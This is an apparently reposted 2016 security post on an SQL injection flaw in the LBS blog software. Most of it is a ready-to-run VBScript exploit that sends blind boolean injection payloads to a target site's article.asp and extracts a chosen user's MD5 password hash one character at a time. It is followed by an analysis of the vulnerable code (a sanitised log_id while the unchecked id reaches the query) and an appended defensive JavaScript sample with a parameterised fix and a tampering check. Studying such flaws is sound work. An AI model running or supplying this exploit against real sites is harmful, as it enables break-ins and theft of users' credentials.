LBS blog SQL injection vulnerability [All versions] - official patch available
Published: 2016-12-30 Source: 查字典 editor

Heh, this is just to prove the vulnerability exists.

The exploit is below; save it as a .vbs file, then download the program and test it against your own install.

' From 剑心
' ============================================================================
' Usage:
' At the command prompt:
'   cscript.exe lbsblog.vbs <blog path of the target site> <valid article id> <id of the blog user whose password to crack>
' e.g.:
'   cscript.exe lbsblog.vbs www.xxxx.com/blog/ 1 1
' by loveshell
' ============================================================================

On Error Resume Next

Dim oArgs
Dim olbsXML            ' XMLHTTP object used to open the target URL
Dim TargetURL          ' target URL
Dim userid, articleid  ' blog user id and article id
Dim TempStr            ' holds the part of the MD5 password recovered so far
Dim CharHex            ' hexadecimal character set
Dim charset

Set oArgs = WScript.Arguments
If oArgs.Count < 1 Then Call ShowUsage()

Set olbsXML = CreateObject("Microsoft.XMLHTTP")

' Complete the target URL
TargetURL = oArgs(0)
If LCase(Left(TargetURL, 7)) <> "http://" Then TargetURL = "http://" & TargetURL
If Right(TargetURL, 1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL = TargetURL & "article.asp"
articleid = oArgs(1)
userid = oArgs(2)
TempStr = ""
CharHex = Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f", ",")

WScript.Echo "LBS blog All version Exploit" & vbCrLf
WScript.Echo "By 剑心" & vbCrLf
WScript.Echo "http://www.loveshell.net/ Just For fun :)" & vbCrLf & vbCrLf
WScript.Echo "+ Fuck the site now" & vbCrLf

Call main(TargetURL, BlogName)

Set olbsXML = Nothing

'---------------------------------------------- sub -------------------------------------------------------

' ============================================
' Function name: main
' Purpose: main routine; recovers the blog user's password via injection
' ============================================
Sub main(TargetURL, BlogName)
    Dim MainOffset, SubOffset, TempLen, OpenURL, GetPage
    For MainOffset = 1 To 40
        For SubOffset = 0 To 15
            TempLen = 0
            postdata = ""
            postdata = articleid & " and (select left(user_password," & MainOffset & ") from blog_user where user_id=" & userid & ")='" & TempStr & CharHex(SubOffset) & "'"
            OpenURL = TargetURL
            olbsXML.Open "Post", OpenURL, False, "", ""
            olbsXML.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
            olbsXML.send "act=delete&id=" & escape(postdata)
            GetPage = BytesToBstr(olbsXML.ResponseBody)
            ' Check whether the requested page exists
            If InStr(GetPage, "deleted") <> 0 Then
                ' "blog user does not exist or the data entered is wrong" is the error marker;
                ' getting it back means the guessed MD5 character is wrong
                ' If you end up with an MD5 of 0000000000000000, change the error marker
            ElseIf InStr(GetPage, "permission") <> 0 Then
                TempStr = TempStr & CharHex(SubOffset)
                WScript.Echo "+ Crack now: " & TempStr
                Exit For
            Else
                WScript.Echo vbCrLf & "Something error" & vbCrLf
                WScript.Echo vbCrLf & GetPage & vbCrLf
                WScript.Quit
            End If
        Next
    Next
    WScript.Echo vbCrLf & "+ We Got It: " & TempStr & vbCrLf & vbCrLf & ":P Don't Be evil"
End Sub

' ============================================
' Function name: BytesToBstr
' Purpose: convert the XMLHTTP response body into a GB2312-encoded string
' ============================================
Function BytesToBstr(body)
    Dim objstream
    Set objstream = CreateObject("ADODB.Stream")
    objstream.Type = 1
    objstream.Mode = 3
    objstream.Open
    objstream.Write body
    objstream.Position = 0
    objstream.Type = 2
    objstream.Charset = "GB2312"
    BytesToBstr = objstream.ReadText
    objstream.Close
    Set objstream = Nothing
End Function

' ============================
' Function name: ShowUsage
' Purpose: print usage help
' ============================
Sub ShowUsage()
    WScript.Echo "LBS blog Exploit" & vbCrLf & "By Loveshell/剑心"
    WScript.Echo "Usage:" & vbCrLf & "CScript " & WScript.ScriptFullName & " TargetURL BlogName"
    WScript.Echo "Example:" & vbCrLf & "CScript " & WScript.ScriptFullName & " http://www.loveshell.net/ 1 1"
    WScript.Echo ""
    WScript.Quit
End Sub

Vulnerability details:

In src_article.asp:

......

input["log_id"] = func.checkInt(input["log_id"]);
if (!input["id"]) {
    strError = lang["invalid_parameter"];
} else {
    // Check if the article exists
    theArticle.load("log_id,log_authorID,log_catID", "log_id=" + input["id"]);
    strError = false;
}

......

What gets filtered is log_id, but what is actually used is id, heh :)

And then?

The code in class/article.asp:

this.load = function(strselect, strwhere) {
    var tmpA = connBlog.query("select TOP 1 " + strselect + " FROM [blog_Article] where " + strwhere);
    if (tmpA) {
        this.fill(tmpA[0]);
        return true;
    } else {
        return false;
    }
}

The above needs no explanation, heh. Triggering it does have a precondition, though; let's see whether it can be met!

function articledelete() {
    if (theUser.rights["delete"] < 1) {
        // Check User Right - without DB Query
        pageHeader(lang["error"]);
        redirectMessage(lang["error"], lang["no_rights"], lang["goback"], "javascript:window.history.back();", false, "errorbox");
    } else {
        var theArticle = new lbsArticle();
        var strError;

By default, guests have delete rights. A further check is made afterwards, but by then the injection has already happened, and it is precisely that later check whose different error messages the injection reads, heh.
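The same mismatch and its fix, reduced to plain JavaScript as an added example (not LBS blog's own code): checkInt and the two lookup builders are modelled on the snippets above, the SQL is returned as a string plus bound parameters in place of connBlog.query, and the tampered request is a constructed sample.

```javascript
// Mirror of the page's func.checkInt: a value that is not a plain
// integer becomes 0, so a field that went through it cannot carry SQL.
function checkInt(value) {
  return /^\d+$/.test(String(value).trim()) ? parseInt(value, 10) : 0;
}

// Vulnerable shape (src_article.asp + class/article.asp): log_id is
// validated, but the unvalidated id is what gets spliced into the WHERE.
function buildArticleLookupVulnerable(input) {
  input.log_id = checkInt(input.log_id);   // sanitised, then never used
  if (!input.id) return { error: "invalid_parameter" };
  return {
    sql: "select TOP 1 log_id,log_authorID,log_catID FROM [blog_Article]" +
         " where log_id=" + input.id
  };
}

// Hardened shape: validate the field that is actually used, fail closed
// when it is not a positive integer, and bind it instead of concatenating.
function buildArticleLookupHardened(input) {
  const id = checkInt(input.id);
  if (id === 0) return { error: "invalid_parameter" };
  return {
    sql: "select TOP 1 log_id,log_authorID,log_catID FROM [blog_Article]" +
         " where log_id=?",
    params: [id]
  };
}

// Defender's check over logged request parameters: every field the
// application treats as an integer id must round-trip through checkInt.
function tamperedIntFields(fields, intFieldNames) {
  return intFieldNames.filter(name =>
    name in fields &&
    String(checkInt(fields[name])) !== String(fields[name]).trim());
}

// Constructed sample request (hypothetical): a non-numeric id on act=delete.
const tamperedRequest = { act: "delete", log_id: "11", id: "11 and 1=1" };

console.log(buildArticleLookupVulnerable({ ...tamperedRequest }).sql);
console.log(buildArticleLookupHardened({ ...tamperedRequest }));
console.log(tamperedIntFields(tamperedRequest, ["log_id", "id"]));
```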
